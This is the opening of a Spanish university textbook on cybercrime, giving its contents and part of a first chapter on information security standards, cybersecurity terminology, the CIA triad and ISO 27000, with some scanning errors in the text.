Cibercriminalidad MM

Descargar como pdf o txt
Descargar como pdf o txt
Está en la página 1de 374

ALICIA G IL GIL

ROBERTO HERNÁNDEZ BERLINCHES

(Coordinadores)

Cibercriminalidad

SERGIO CÁMARA ARROYO

JESÚS CANO CARRILLO

ASCENSIÓN GARCÍA Ruiz

ALICIA GIL GIL

ROBERTO HERNÁNDEZ BERLINCHES

CARLOS MARTÍN FERNÁNDEZ

RAFAEL PASTOR VARGAS

ANTONIO ROBLES GóMEZ

LLANOS TOBARRA ABAD

DYKINSON
2019
No está permitida la reproducción total o parcial de este libro, ni su incorporación a un sistema in-
fonnático, ni su transmisión en cualquier forma o por cualquier medio, sea este electrónico, mecánico,
por fotocopia, por grabación u otros métodos, sin el permiso previo y por esc1ito del editor. La infrac-
ción de los derechos mencionados puede ser constitutiva de delito contra la propiedad intelectual (art.
270 y siguientes del Código Penal).
Dirijase a Cedro (Centro Español de Derechos Reprográficos) si necesita fotocopiar o escanear
algún fragmento de esta obra. Puede contactar con Cedro a través de la web www.conlicencia.com o por
teléfono en el 917021970/ 932720407

Este libro ha sido sometido a evaluación por parte de nuestro Consejo Editorial
Para mayor información, véase www.dykinson.com/quienes_somos

© Copyright by
Los autores
Madrid, 2019

Editorial DYKINSON, S.L.


Meléndez Valdés, 61- 28015 Madrid
Teléfono ( +34) 915442846 - (+34) 915442869
e-mail: [email protected]
http://www.dykinson.es
http:/ /www.dykinson.com

ISBN: 978-84-1324-269-9
Depósito Legal: M-31769-2019

Preirnpresión:
Besing Servicios Gráficos, S.L.
[email protected]
ÍNDICE

Capitulo l. La seguridad informática .................................................... . 3

I. LA ESTANDARIZACIÓN................................................................................................. 5
l. La necesidad de la estandarización............................................................ 5
2. Los organismos oficiales de estandarización ....................................... 8

II. LA SEGURIDAD................................................................................................................. 10
l. Terminología............................................................................................................ 10
2. Gestión de la seguridad de la información.............................................. 10
3. Principios básicos ................................................................................................. 12
4. Sistema de gestión de la seguridad de la información (SGSI).
Definición. ISO 27000, NIST Special Publication y COBIT............... 14
III. AMENAZAS, VULNERABILIDADES, ATAQUES (HACKING) Y GESTIÓN DE
RIESGOS.. ............................................................................................................................. 17
l. Amenazas................................................................................................................... 17
2. Vulnerabilidades.................................................................................................... 20
3. Ataques (hacking) ................................................................................................. 23
4. Gestión del riesgo .................................................................................................. 26

Capitulo 2. Fundamentos de computadores y redes ..................... . 31


I. FUNDAMENTOS DE COMPUTADORES .................................................................. 33
l. Algunos conceptos pr vlos............................................................................... 33
2. Hardware.................................................................................................................... 35

- VIl -
Índice

3. Software ...................................................................................................................... 37
II. FUNDAMENTOS DE REDES......................................................................................... 38
l. Conceptos básicos................................................................................................. 38
2. Protocolo de comunicaciones......................................................................... 42
2.1. El modelo OSI.................................................................................................. 42
2.2. El modelo TCP/IP....... .................................................................................... 46
2.3. Los dispositivos de conexión: hub, switch y pasarelas (gateways) .... 56
III. CÓDIGOS MALICIOSOS.................................................................................................. 59
l. Gusanos y Virus ...................................................................................................... 61
2. Rootkits, troyanos, puertas traseras (backdoors)................................ 62
3. Keyloggers y stealers............................................................................................ 65
4. Spyware, adware, hijacking............... ............................................................... 65
5. Dialers, Ransomware, APTs, PoS malware ............................................... 66
6. Botnets ......................................................................................................................... 69
IV. INTERNET Y REDES SOCIALES ................................................................................. 69
l. Definición y características ............................................................................ 69
2. Amenazas en redes sociales ........................................................................... 70

Segunda parte
Aspectos penales y criminológicos de la criminalidad
relacionada con las TIC. Cuestiones generales

Capítulo 3. , Particularidades de la criminalidad


relacionada con las TIC .......................................................... 77
I. INTRODUCCIÓN: LA CRIMINOLOGÍA Y EL CIBERCRIMEN ............................ 79
l. Cibercriminología ................................................................................................. 79
2. Teorías criminológicas aplicables al cibercrimen.............................. 81
II. EL CIBERDELINCUENTE .............................................................................................. 88
l. El perfil del ciberdelincuente ......................................................................... 88
2. Cibercriminales especializados.............. ...................................................... 96
3. El ciberdelincuente no especializado ........................................................ 104
4. Clasificación de los ciberdelincuentes según su motivación y
tipología delictiva................. ..... ............................................................................ 105
III. LA VÍCTIMA FRENTE AL CIBERDELITO: PERFIL VICTIMOLÓGICO........... 107
l. La política criminal frente a la cibercriminalidad .............................. 108

- VIII -
2. Eventualidad delictiva y prevención del cibercrimen: especial
referencia a la teoría de las actividades cotidianas y a la teoría
del Actor-Red........................................................................................................... 109
3. Ambigüedad en torno a la cifra negra en la cibercriminalidad .. 115
4. Prevalencia y estadísticas de cibervictimización................................ 116
5. Cibervíctima y prevención del ciberdelito .............................................. 117
6. El proceso de victimización ............................................................................. 120
IV. LA PRUEBA EN EL CIBERCRIMEN............................................................................ 123
l. La informática forense ....................................................................................... 123
2. La prueba electrónica ......................................................................................... 126
3. Tipos de prueba electrónica............................................................................ 129
3.1. Posibles clasificaciones ................................................................................ 129
3.2. Los medios de prueba electrónica más comunes ............................... 130
4. Tratamiento legal de la prueba electrónica........................................... 132
4.1. Principios establecidos a nivel internacional...................................... 132
4.2. Regulación en España ................................................................................. 132
5. La presentación de la prueba en el proceso. Problemas
adicionales................................................................................ ............. ................... 138

Capitulo 4. El cibercrimen.
Definición, clasificación y marco legislativo ........... .. 141
I. INTRODUCCIÓN. LA RELEVANCIA PENAL DE LAS NUEVAS
TECNOLOGÍAS.................................................................................................................. 143
l. Los sistemas de información y sus funciones como objeto de
protección... ............................................................................................................... 148
2. Las nuevas tecnologías como nuevas formas de ataque a
bienes jurídicos tradicionales........................................................................ 150
II. TERMINOLOGÍA ............................................................................................................... 154
l. Delitos informáticos v. cibercrimen ........................................................... 154
2. Cibercrimen en sentido estricto v. en sentido amplio...................... 156
3. Qué no es un cibercrimen................................................................... ............ .. 158
3.1. Conductas ilícitas que no son cibercrímenes ...................................... 158
3.2. Delitos en los que intervienen las TIC que no son cibercrfmenes 160
III. CLASIFICACIÓN DE LOS CIBERCRÍMENES .......................................................... 161
l. Por el bien jurídico................................................................... ............................ 161
2. Por la intencionalidad.................. ................................................................ ....... 165
3. Por su relación con el medio informático ................................................ 166

- IX -
Índice

IV. MARCO LEGISLATIVO.................................................................................................... 167


l. Marco legislativo internacional .................................................................... 169
2. Marco legislativo de la Unión Europea ..................................................... 172
3. Marco legislativo nacional............................................................................... 176
4. Aplicación espacial de la legislación y jurisdicción .......................... 182
4.1. Características relativas al lugar de comisión en la
cibercriminalidad.......................................................................................... 182
4.2. La atribución de competencia jurisdiccional en la Decisión
Marco 2009/ 948/ JAI ................................................................................... 183
4.3. La atribución de jurisdicción en la legislación española................ 184
4.4. El modelo de atribución de competenciajurisdiccional en el
Convenio de Budapest.................................................................................. 186

Tercera parte
Los cibercrimenes en particular

Capítulo 5. Ciberdelitos en sentido estricto ....................................... . 193


I. HACKING. ACCESO ILÍCITO .......................................................................................... 19 5
l. Artículo 197 bis CP................................................................................................ 197
1.1. Intrusismo informático................................................................................ 197
1.2. La interceptación de transmisiones no públicas de datos
informáticos.................................................................................................... 207
2. Actos preparatorios del artículo 197 ter CP ........................................... 209
3. Agravaciones específicas................................................................................... 210
4. Di~posiciones comunes...................................................................................... 210
4.1. Responsabilidad de las personas jurídicas........................................... 210
4.2. Requisitos de procedibilidad ..................................................................... 211
5. Hacking cometido por autoridad o funcionario púbico: el
artículo 198 CP........................................................................................................ 212
11. MALWARE. DAÑOS INFORMÁTICOS........................................................................ 213
l. Dafí.os informáticos. Artículo 264 CP ......................................................... 214
l. l. El tipo básico ................................................................................................... 215
1.2. Las agravantes específicas......................................................................... 218
2. Obstaculización o interrupción del funcionamiento del
sistema. Artículo 264 bis CP ............................................................................ 220
2.1. El tipo básico................................................................................................... 221
2.2. Las agravantes específicas:........................................................................ 223
3. Actos preparatorios. Artículo 264 ter CP ................................................. 223
4. Disposiciones comunes...................................................................................... 224

- X -
indlc1•

4.1. Responsabilidad de las personasjur(dicas........................................... 224


4.2. Excusa absolutoria........................................................................................ 224

Capítulo 6. Cibercrímenes en sentido amplio .................................. .. 229


I. NUEVAS TIPOLOGÍAS DELICTNAS .......................................................................... 231
l. Nuevos delitos contra la intimidad y la indemnidad sexual.......... 231
1.1. Grooming (art. 183 ter CP) ........................................................................ 232
1.2. Sexting (art.197.7CP) ................................................................................. 243
2. Nuevos delitos contra la propiedad ........................ .................................... 248
2.1. Estafas Informáticas (art. 248.2 CP) ...................................................... 248
2.2. Breve referencia a la.figura de los "muleros" ...................................... 249
3. Nuevos delitos contra la propiedad intelectual.................................... 250
3.1. Tipos de ciberpirater(a relacionados con el software ...................... 253
3. 2. El giro revolucionario en la criminalización de las páginas web de
enlace (art. 270.2 CP) .................................................................................................... 255
3.3. Los actos preparatorios en los delitos contra la propiedad
intelectual (art. 270.6 CP) .......................................................................... 260
3. 4. La pirateria de servicios de comunicación y electrónicos (art. 286 CP) . 2 61
3.5. Otras disposiciones comunes.................................................................... 263
II. NUEVAS MODALIDADES DE COMISIÓN PARA DELITOS CLÁSICOS ........... 264
l. Delitos contra la propiedad intelectual............ ........................................ 264
2. Descubrimiento y revelación de secretos de empresa
(ciberespionaje o snooping) . Art. 278 CP ................................................. 265
3. Estafas comunes a través de medios tecnológicos .............................. 269
4 . Delito de provocación o complicidad psíquica con los
desórdenes públicos. Art. 559 CP ................................................................. 271
5. Autoadoctrinamiento o autoadiestramiento terrorista.
Art. 575.2 CP................................................................................................................... 272
6. Otros supuestos delictivos....................................... ......................................... 275

Cuarta parte
Anexo. Casos Prácticos

l. Prácticas de seguridad informática .............................................. . 289


PRÁCTICA N. l. EL IMPACTO DE LA SEGURIDAD.............................................................. 291
l. Objetivos..................................................................................................................... 291
2. Desarrollo de la actividad ................................................................................. 291
3. Cuestionario................................................................................................... .......... 302

- XI -
Índice

PRACTICAN. 2. INFORMACIÓN EN LA RED....................................................................... 303


l. Objetivos..................................................................................................................... 303
2. Desarrollo de la actividad................................................................................. 303
3. Cuestionario.................................................. ........................................................... 311
PRACTICAN. 3. CÓMO EXPLICAR INTERNET A UN ADOLESCENTE....................... 313
l. Todo el mundo quiere hacer las cosas a su manera, pero, si
queremos comunicarnos, tendremos que ponernos de
acuerdo en al menos cómo hacerlo............................................................. 313
2. La comunicación y quién conoce quién es quién................................. 314
3. Cuestionario............................................................................................................. 318

2. Casos prácticos de cibercrímenes ................................................... 319


l. INTRODUCCIÓN. ELEMENTOS DE ANÁLISIS DEL CASO PRÁCTICO ......... 321
l. El informe criminológico en Criminología aplicada.......................... 322
2. El escrito de calificaciones............................................................................... 328
2.1. Los hechos probados ofactum.................................................................. 329
2.2. Calificaciónjur{dica de los hechos........................................................... 330
2.3. Iter criminis ..................................................................................................... 330
2.4. Autoría y participación ............................................................................... 3 31
2.5. Circunstancias modificativas de la responsabilidad criminal ...... 331
2.6. Determinación de la pena.......................................................................... 331
2. 7. Posibilidad de suspensión y sustitución de la pena........ ................... 334
2.8. Responsabilidad civil derivada de delito.... ........................................... 334
II. CASOS PRÁCTICOS.......................................................................................................... 33 5
Caso N. l ............................................................................................................................. 335
Caso N. 2 ............................................................................................................................. 336
Caso N. 3 ............................................................................................................................. 337
Caso N. 4 ............................................................................................................................. 338
Caso N. 5 ............................................................................................................................. 339
Caso N. 6 ............................................................................................................................. 340
Caso N. 7 ............................................................................................................................. 341
Caso N. 8 ............................................................................................................................. 342
Caso N. 9 ............................................................................................................................. 343
Caso N. 10........................................................................................................................... 344
Caso N.11........................................................................................................................... 345
Caso N. 12........................................................................................................................... 346

Bibliografla ................................................................................................................. 34 7

- XII -
Primera parte:
FundaIDentos de seguridad
en tecnología inforIDática
Capítulo 1
La seguridad informática
OBJETIVOS DEL CAPÍTULO
l. LA ESTANDARIZACIÓN

l. La necesidad de la estandarización

Hasta hace algo más de dos décadas, el término seguridad solía ir acom-
pañado de un ámbito concreto. Así, por ejemplo, en Ingeniería se hablaba de
seguridad de sistemas eléctricos y electrónicos, seguridad en los sistemas de
comunicación en los procesos industriales, etc. En otros ámbitos, como el de-
recho o la organización de empresas, se hablaba en términos de seguridad de
las personas, de las empresas, de las instituciones, etc.
Con la aparición de la tecnología informática podría decirse que práctica-
mente la totalidad de los entornos industriales o relacionados con cualquier ámbi-
to de la ingeniería incorporaron programación a sus instalaciones o productos, de
manera que la denominada tecnología informática se convirtió en una tecnología
transversal a todas ellas. Sucesivamente, otros ámbitos de conocimiento se fueron
incorporando al uso de tecnologías informáticas, en el sentido de que hacían uso
de algún tipo de programación, almacenamiento digital de información, etc.
En aquel contexto, todavía la seguridad podía entenderse dentro de cada ám-
bito de conocimiento con sus técnicas y especificaciones propias. Sin embargo, con
la aparición de Internet, y especialmente con la facilitación de su uso mediante los
navegadores, la tecnología informática se ha ido expandiendo y penetrando hasta
llegar a todos los ámbitos industriales, empresariales y comerciales, llegando a es-
tar permanentemente presente en la vida cotidiana de los ciudadanos.
Por ello, la primera cuestión a resolver es cómo abordar la seguridad in-
formática en su conjunto. La aproximación profesional al problema se realiza
a través de los estándares.

- 5 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

En general, se entiende por estándar un conjunto de definiciones, nor-


mas y procedimientos que sirve de patrón, modelo o punto de referencia para
medir o valorar cosas de la misma especie. Existen para todos los ámbitos,
desde los más concretos, cuyo ejemplo clásico son los enchufes para la red
eléctrica, hasta los más amplios como es el caso de la seguridad informática.
La normalización facilita los procesos, tiene como objetivo beneficiar al
conjunto de los ciudadanos, e intenta garantizar sus derechos individuales. En
un principio, los objetivos fundamentales eran de índole económica. Piénsese
por ejemplo en que si cada país utilizara unos enchufes diferentes para la red
eléctrica ello implicaría un gran coste tanto para los fabricantes de electro-
domésticos como para los consumidores. Pero en la actualidad, en un mundo
globalizado y permanentemente conectado, sus objetivos se han ampliado a
garantizar los derechos de los ciudadanos. Así, puede decirse que hace pocos
años las especificaciones para el desarrollo de un sistema de gestión de la
información venían dadas fundamentalmente por criterios económicos. Sin
embargo, en la actualidad empiezan a prevalecer los criterios legales.
En este contexto, es importante determinar claramente los conceptos de
normalización y norma. El término norma, en España, suele entenderse con
connotaciones jurídicas. En este sentido, es habitual que se entienda norma-
lizar como legislar. Sin embargo, no es así. Por ello, es aconsejable utilizar los
términos estandarización y estándar en su lugar.
Ej. 1.1: Así, por ejemplo, en el caso de un producto, como la conexión
Ethernet (IEEE 802.3), la estandarización establece los criterios técnicos nece-
sarios para que todo lo que sea fabricado y denominado como Ethernet cumpla
con esas especificaciones.

Posteriormente son las legislaciones las que adoptan un criterio técnico


u otro como de obligado cumplimiento. En el caso de la estandarización de
sistemas de gestión, los estándares incluyen recomendaciones que son con-
sideradas buenas prácticas. Con ellas, entidades denominadas "autoridades
de certificación" nacionales e internacionales, evalúan el cumplimiento del
estándar y certifican o no que se satisfacen, para conocimiento de los ciuda-
danos, empresas o Estados.
Los estándares se establecen a través de consensos de gran alcance y
con la participación de técnicos cualificados. Normalmente disponen de un
"comité técnico de normalización", imprescindible para el desarrollo del es-
tándar. Pero no es solo un trabajo técnico. Por ejemplo, para estandarizar los
enchufes, deben participar empresas del sector con claros intereses econó-
micos, representantes de Estados, etc.

- 6 -
Capitulo l . LA SEGURIDAD INFORMÁTICA

En el caso de los sistemas informáticos existen estándares puramente


técnicos que determinan cómo debe ser cada uno de los elementos que se
utilizan. Pueden ser protocolos de comunicación, conectores o elementos fí-
sicos, modelos de almacenamiento de datos, etc.
Especialmente importante es el hecho de que la estandarización dificul-
ta que las empresas diseñen sus productos de forma cerrada e incompatible
con productos de otros fabricantes, de este modo se dificulta la tendencia al
establecimiento de monopolios y se favorece la interoperabilidad y flexibili-
dad del mercado. En la actualidad la Unión Europea, por ejemplo, ha dispues-
to de un gran número de directivas concretas en este sentido.
Existen dos tipos de estándares, de facto y de iure. Los primeros son
estándares con gran aceptación en el mercado, establecidos normalmen-
te por grupos de empresas y organizaciones, pero no reconocidos oficial-
mente. Esto puede suceder tanto en el ámbito tecnológico como en el de
gestión.
Ej. 1.2: Un supuesto de estándar tecnológico defacto, es decir, no reconoci-
do oficialmente, es el formato de archivos pdf

Una empresa puede elaborar una normativa o metodología para el


desarrollo de sus productos y servicios, siendo esta propiedad absoluta
de la empresa. Si esta normativa tiene éxito, puede permitirse su uso a
otras empresas del sector, normalmente con el fin de crear dependencia
en los clientes para ser su única opción de compra. A esta normativa se
le denomina «estándar propietario», y si alcanza una penetración en el
mercado considerable, puede llegar a convertirse en estándar de facto, e
incluso de iure.
Los estándares de iure son definidos por organizaciones o grupos oficia-
les, es decir, en los que intervienen Estados con el compromiso de adoptarlos
corno de obligado cumplimiento.
Por otro lado, los estándares pueden clasificarse corno abiertos y ce-
rrados. Los abiertos pueden ser conocidos sin restricción, están publicados.
Pueden ser gratuitos o no. Algunos organismos cobran una cuota por acceder
a sus estándares prohibiendo su distribución, aunque en la mayoría de los ca-
sos la utilización de este estándar no requiere el pago de un canon. A este tipo
de estándares se les denomina estándares de distribución restringida. Los es-
tándares cerrados son estándares únicamente accesibles para los miembros
de la empresa, grupo de empresas o entidad propietaria.

- 7 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

2. Los organismos oficiales de estandarización

Los organismos oficiales de estandarización están formados por repre-


sentantes de los Estados participantes, empresas del sector, académicos y
consultores independientes.
En el ámbito internacional destacan:
IEEE (leído IE cubo): Es la mayor asociación profesional para el avance
de la innovación y la excelencia tecnológica.
Sus publicaciones son de reconocido prestigio y desarrolla una gran ac-
tividad mediante conferencias, estándares tecnológicos, y actividades pro-
fesionales y educativas. Sus estándares son frecuentemente de penetración
mundial, por ejemplo, los trabajos del comité 802 que desarrolla estándares
de protocolos de comunicaciones para la interfaz física de las conexiones, las
redes locales de datos, etc.
ISO: La Organización Internacional de Normalización (International
Organization for Standardization) es una organización para la creación de
estándares internacionales compuesta por diversas organizaciones nacio-
nales de estandarización. Está formada por organismos de estandarización
de diversos países (ANSI en EEUU, DIN en Alemania, AENOR en España, ... )
y por un grupo de organizaciones observadoras, que no poseen capacidad
devoto.
Fue una de las primeras organizaciones a las que se le concedió estatus
consultivo general en el Consejo Económico y Social de las Naciones Unidas.
En el contexto de los sistemas informáticos destacan:
ITU (International Telecommunication Union, UIT en castellano, Unión
Internacional de Telecomunicaciones) . Es la organización más importante
de las Naciones Unidas en lo que concierne a las tecnologías de la infor-
mación. Esta organización representa un foro global para los gobiernos y
el sector privado en el desarrollo de redes y servicios. Coordina el uso del
espectro radioeléctrico, promoviendo la cooperación internacional para
la asignación de órbitas de satélites, trabajando para mejorar las infraes-
tructuras de comunicación mundiales, estableciendo estándares mundiales
para la interconexión de un enorme rango de sistemas de comunicación, y
haciendo frente a problemas actuales, como el cambio climático y la seguri-
dad en el ciberespacio.
IETF (Internet Engineering Task Force). El Grupo de Trabajo de Ingenie-
ría de Internet es una organización internacional abierta de normalización

- 8 -
Capitulo l. LA SEGURIDAD IN f:O RMÁ'fl

que tiene corno objetivos contribuir a la ingeniería de Internet, actuando en


diversas áreas, corno transporte, encaminamiento y seguridad. El IETF es
mundialmente conocido por ser la entidad que regula las propuestas y los
estándares de Internet, conocidos corno RFC (Request Por Comments). Es la
organización con más autoridad para establecer modificaciones de los pará-
metros técnicos bajo los que funciona la red.
En EE.UU. destacan:
ANSI (American National Standards Institut, Instituto Americano de
Normas Nacionales). Organización sin ánimo de lucro encargada de super-
visar el desarrollo de estándares que se aplican en los Estados Unidos de
América.
TIA ( Telecommunications Industry Association, Asociación de la Indus-
tria de las Telecomunicaciones). Organización formada por representantes
de las industrias más importantes del sector de las telecomunicaciones y que
ha desarrollado numerosos estándares a nivel internacional relacionados
con el mundo de las redes en colaboración con ANSI y la antigua EIA.
En Europa destacan:
ETSI (European Telecommunications Standardas Institute), Instituto Eu-
ropeo de Estándares de las Telecomunicaciones). Es una organización inde-
pendiente sin ánimo de lucro. Es reconocida por la Unión Europea como una
organización de estándares europeos.
CEN (Comité Europeo de Normalización). Es una organización privada
sin ánimo de lucro cuya misión es fomentar la economía europea en el ne-
gocio global, el bienestar de los ciudadanos europeos y el medio ambiente,
proporcionando una infraestructura eficiente a las partes interesadas para el
desarrollo, el mantenimiento y la distribución de sistemas estándares cohe-
rentes y de especificaciones.
En España destaca:
AENOR (Asociación Española de Normalización). Fundada en 1935
y refundada en 1986, es el organismo nacional de normalización que a
través de sus Comités Técnicos de Normalización se encarga de la publica-
ción de las normas UNE (Una Norma Española) y la adopción y aplicación
de las normas europeas. Está relacionado con organismos europeos como
CENy ETSI.
Entre sus éxitos destaca la implantación de la Norma ISO 9001, cuya de-
manda por parte de las organizaciones industriales y de servicios y pyrnes ha
superado la expedición de 25.000 certificados.

- 9 -
Ctbercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

II. LA SEGURIDAD

l. Terminología

Generalmente, se utilizan indistintamente los términos "seguridad de la


información", "seguridad informática", "seguridad en las TIC" y "ciberseguridad".
Cada uno incorpora sus matices, pero el término ciberseguridad incluye
una connotación especial: el ciberespacio. Aunque el ciberespacio es por ex-
tensión una gran red y ya los conceptos de comunicaciones y redes de datos
lo incluyen, hay algunos aspectos que se resaltan al hablar de ciberseguridad.
Algunos autores quieren hacer ver que el componente más diferenciador de
la ciberseguridad es el componente humano. El fenómeno del hacking y la
ingeniería social son aspectos que matizan a la ciberseguridad dentro de este
amplio abanico terminológico, especialmente en los últimos años.
La definición de ciberseguridad de la UIT-T (Unión Internacional de Te-
lecomunicaciones) se encuentra recogida en la norma técnicaX.1205 que tra-
ta sobre los aspectos generales de la ciberseguridad (2008).
Así, ciberseguridad es el conjunto de herramientas, políticas, conceptos de
seguridad, salvaguardas de seguridad, directrices, métodos de gestión de riesgos,
acciones, formación, prácticas idóneas, seguros y tecnologías que pueden utilizarse
para proteger los activos de la organización y los usuarios en el ciberentorno.
Los activos de la organización y los usuarios están integrados por: los
dispositivos informáticos conectados, los usuarios, los servicios/aplica-
ciones, los sistemas de comunicaciones, las comunicaciones, los elementos
multimedia y la totalidad de la información transmitida y/ o almacenada en
el ciberentorno. La ciberseguridad garantiza que se alcancen y mantengan
las propiedades de seguridad de los activos de la organización y los usuarios
contra los riesgos de seguridad correspondientes en el ciberentorno.

2. Gestión de la seguridad de la información

En general, se entiende por gestión de la seguridad de la información los


procesos y metodologías que se han diseñado para proteger los datos o la in-
formación sensible, de accesos no autorizados, uso fraudulento, publicación
indebida, modificación, destrucción, o interrupción de su procesamiento.
La gestión de la seguridad incluye una serie de actividades de análisis
y estudio como son: activos, amenazas, vulnerabilidades, incidentes de se-

- 10 -
Capítulo l . LA SEOtJR IOAD INfl llMÁTl A

guridad, impactos, riesgos, defensas-salvaguardas-medidas de seguridad, y


transferencia del riesgo a terceros.
La seguridad debe entenderse y extenderse en todos los ámbitos. De
este modo pueden establecerse niveles. La seguridad física es el primer nivel
de seguridad que se ha abordado tradicionalmente. Se concentra en restrin-
gir el acceso físico a los componentes informáticos del sistema o a las ubica-
ciones donde puede almacenarse la información sensible. Bajo la seguridad
física se encuentra la seguridad del hardware, incluyendo algunos compo-
nentes físicos que se suelen incluir en otro grupo de seguridad tales corno los
routers o los switches, que suelen considerarse bajo la seguridad de la red. Los
elementos característicos a considerar en este nivel son el personal de segu-
ridad, accesos físicos, sistemas de cámaras, sistemas de detección de intrusos
(Intrusion Detection Systerns, IDS) a nivel de equipo, sensores de humedad y
temperatura, sistemas biornétricos, antivirus, etc.
En un segundo nivel la seguridad de red se concentra en la protección
de los datos que son transmitidos y en garantizar que no sufren ninguna alte-
ración durante la transmisión. La seguridad en red se ha vuelto fundamental
debido al avance de Internet y la necesidad de proteger los millones de datos
compartidos a través de la World Wide Web (www). Debido a la alta conecti-
vidad actual, se utiliza más el termino seguridad de las comunicaciones, que
incluye la seguridad de las redes e incorpora los mecanismos de enrutado se-
guro, de creación de sesiones seguras y encriptación, etc. Así, deben conside-
rarse elementos tales como hardware de seguridad, configuración correcta,
uso de protocolos seguros, contrasefias seguras, encriptación, firewalls, IDS
en red, ...
Un tercer nivel es la seguridad del software que se concentra en la segu-
ridad relacionada con los sistemas operativos, así corno de los programas y
aplicaciones, incluyendo las herramientas que se utilizan para garantizar la
seguridad de la información. Ejemplos de elementos a considerar son los me-
canismos de autenticación, configuración de controles, codificación segura,
validación de entradas de programa, procesamiento verificado, actualización
de drivers, controles de servidores web y bases de datos, encriptación, etc.
Por último, la seguridad del personal o seguridad humana constituye un
conjunto de medidas esenciales. Mantener al personal motivado, haciéndoles
participes de los riesgos de la seguridad de la información, así como involu-
crándolos en la implementación de la seguridad es un aspecto fundamental
que no debe olvidarse nunca. Deben atenderse aspectos tales corno conscien-
cia, educación, observación y vigilancia, comprensión de errores, seguimien-
to de procedimientos ...

- 11 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

No es posible garantizar la seguridad al 100%, pero, si se han desarro-


llado medidas de seguridad de forma efectiva, se podrán controlar muchas de
las amenazas, así como estar preparados para proporcionar una respuesta
reactiva a las mismas. Las organizaciones solo pueden desarrollar estrategias
defensivas ya que una estrategia atacante suele ser ilegal en la mayoría de los
Estados.

3. Principios básicos

La seguridad de la información, desde los inicios de la computación, se


ha basado en los tres principios básicos del denominado modelo CIA: confi-
dencialidad, integridad y disponibilidad (availability). Este modelo también
es conocido como triángulo CIA debido a las relaciones entre sus elementos.

Los vértices del triángulo son las dimensiones básicas de la seguridad,


mientras que las aristas representan aspectos derivados o servicios básicos
de la seguridad que implican dos posibles nodos. Por ejemplo, el servicio de
no-repudio implica la arista CI formada por la configuración de la confiden-
cialidad y la integridad, y es utilizada para que alguien no niegue la autoría
de una acción, aspecto básico por ejemplo para aplicaciones de firma electró-
nica. De la misma manera, la arista CA formada por la confidencialidad y la
disponibilidad tratan de hacer posible el servicio de autenticación, utilizado
en la gestión de accesos y la identificación de los usuarios. La mezcla de la

- 12 -
Capitulo l. LA SEGURIDAD INflOllMÁTJ A

disponibilidad y la integridad permite implementar servicios relacionados


con la privacidad en el sentido de que la información de un usuario legítimo
solo esté disponible para él y no pueda modificarse por un tercero.
El Esquema Nacional de Seguridad (ENS) en Espafía incluye algunos as-
pectos adicionales. Según el ENS, a fin de poder determinar el impacto que
tendría sobre la organización un incidente que afectara a la seguridad de la
información o de los sistemas, y de poder establecer la categoría del sistema,
se tendrán en cuenta las siguientes dimensiones de la seguridad:
a) Disponibilidad: Propiedad o característica de los activos consisten-
te en que las entidades o procesos autorizados tienen acceso a los
mismos cuando lo requieren.
b) Autenticidad: Propiedad o característica consistente en que una en-
tidad es quien dice ser o bien que garantiza la fuente de la que pro-
ceden los datos.
c) Integridad: Propiedad o característica consistente en que el activo
de información no ha sido alterado de manera no autorizada.
d) Confidencialidad: Propiedad o característica consistente en que la
información ni se pone a disposición, ni se revela a individuos, enti-
dades o procesos no autorizados.
e) Trazabilidad: Propiedad o característica consistente en que las ac-
tuaciones de una entidad pueden ser imputadas exclusivamente a
dicha entidad.
Dos principios básicos deben tenerse en cuenta siempre que se gestio-
nan sistemas de información:
a) El primero es la "necesidad de conocer" (Need-To-Know). Represen-
ta la práctica ideal de que los datos deben ser accedidos solo por aquellos
que los necesiten. Aquellos recursos que tienen una justificación para el tra-
bajo de una persona estarán dentro del ámbito de la necesidad de conocer.
Con esto se perfecciona el control de seguridad sobre datos sensibles y es una
buena práctica en general para las organizaciones y empresas.
En inteligencia, esta idea se asocia a otra máxima conocida como principio de la
compartimentación, donde se clasifica a las personas que pueden acceder a una infor-
mación determinada. De esta manera, se han desarrollado diversas implementacio-
nes para la clasificación de la información, a nivel militar, OTAN, servicios de inteligen-
cia, fuerzas y entidades gubernamentales, a nivel empresarial y otras organizaciones.

Relacionado con esto, se debe hablar del principio de la separación de


funciones, que trata de asociar roles con los detalles para definir la necesidad
de conocer de cada persona.

- 13 -
Cibercriminalídad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

Otro criterio a tener en cuenta es el principio de mínimo privilegio, que


consiste en aplicar una fórmula de mínimo acceso a la información de talma-
nera que elevar ese nivel suponga una operación planificada y programada
dentro de la gestión de la seguridad en la organización.
b) El segundo principio básico es la defensa en profundidad, a veces de-
nominada defensa elástica. Consiste en prevenir el avance de un ataque interpo-
niendo una secuencia de barreras. Resulta más efectiva una defensa organizada
en múltiples capas que en una sola línea, por muy grande y potente que sea.
Este principio deriva en realidad del ámbito militar y ha sido usado desde la
antigüedad. En esencia, lo que se pretende es evitar dejar desprotegida alguna parte
de un sistema, por lo que relacionado con la defensa en profundidad se encuentran
los conceptos de redundancia de recursos y alta disponibilidad.
La máxima de que la seguridad global depende del eslabón más débil viene a
explicar la fragilidad de las medidas de salvaguarda, ya que la seguridad se puede
visualizar como la resistencia de una cadena de medidas donde la medida más débil
romperá la seguridad general del sistema.

4. Sistema de gestión de la seguridad de la información (SGSI).


Definición. ISO 27000, NIST Special Publication y COBIT

Todos estos aspectos de la seguridad deben coordinarse y para ello, tal


y como se ha detallado anteriormente, se dispone de la estandarización. Se-
guidamente se presenta el marco (framework) más conocido y utilizado, In -
formation Security Mangement System Framework (ISMS) proporcionado por
ISO/IEC 2001:2013, que desarrolla la familia ISO 27000.
La serie ISO 27000 es una familia de estándares que proporcionan un
marco para el desarrollo de un programa, en el sentido de plan de seguridad,
desde las primeras fases conceptuales hasta su madurez. Todo el proceso
está dividido en diversas partes para poder abordarlo con facilidad siguiendo
una filosofía de planifica-haz-comprueba-ajusta.
Los estándares que comprende son:
ISO 27001 es la especificación a alto nivel para la gestión de la seguridad de
la información. Un estándar de alto nivel se centra en definir cuestiones como los
objetivos, análisis del rendimiento del programa de seguridad y seguimiento de las
